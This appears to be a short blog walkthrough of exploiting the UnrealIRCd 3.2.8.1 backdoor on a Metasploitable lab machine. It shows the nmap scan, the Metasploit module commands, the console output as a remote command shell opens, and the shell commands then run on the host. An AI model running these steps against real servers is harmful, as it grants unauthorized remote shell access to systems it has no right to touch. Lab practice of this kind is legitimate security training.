control – metasploit unreal_ircd_3281_backdoor

UnrealIRCd is an open source IRC daemon, originally based on DreamForge, and is available for Unix-like operating systems and Windows. Since the beginning of development on UnrealIRCd circa May 1999, many new features have been added and modified, including advanced security features and bug fixes, and it has become a popular server.

root@bt:~# nmap -sV -sC -v -p 6667 IP-Address

6667/tcp open irc Unreal ircd
| irc-info: Server: irc.Metasploitable.LAN
| Version: Unreal3.2.8.1. irc.Metasploitable.LAN
| Lservers/Lusers: 0/1
| Uptime: 0 days, 0:04:32
|_Source ident: OK nmap

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf  exploit(unreal_ircd_3281_backdoor) > set rhost IP-Address
msf  exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to 10.255.245.136:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ahaBucJmQvi2ONTC;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ahaBucJmQvi2ONTC\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Address:59446) at 2011-02-21 08:39:04 +0100

ifconfig

eth0      Link encap:Ethernet  HWaddr 01:02:03:04:05:06
inet addr:IP-Address Bcast:Address  Mask:Mask
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:33523 errors:0 dropped:0 overruns:0 frame:0
TX packets:58400 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
Base address:0xd010 Memory:f0000000-f0020000

ls -l
total 388
-rw------- 1 root root   1365 Jan 20 14:08 Donation
-rw------- 1 root root  17992 Jan 20 14:08 LICENSE
drwx------ 2 root root   4096 Jan 20 14:08 aliases
--w----r-T 1 root root   1175 Jan 20 14:08 badwords.channel.conf
--w----r-T 1 root root   1183 Jan 20 14:08 badwords.message.conf
drwx------ 2 root root   4096 Jan 20 14:08 networks

cd networks

dir

awesomechristians.network  gamescafe.network          networks.ndx
axenet.network           german-elite.network       outsiderz.network
bunker7.network           german-global-irc.network  phazenet.network
burnnet.network           global-irc.network          stormdancing.network
cabonet.network           globalchat.network          template.network
chatcrap.network       icechat.network          thainet.network
chatuniverse.network       infinity.network          unitedirc-org.network
ctcp.network           ircsystems.network          unreal-test.network
darkkaos.network       isno.network              wazzza.network
digitalirc.network       l33t-irc.network          x-irc.network
discussioni.network       lcirc.network          zirc.network
dragonwings.network       makenet

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s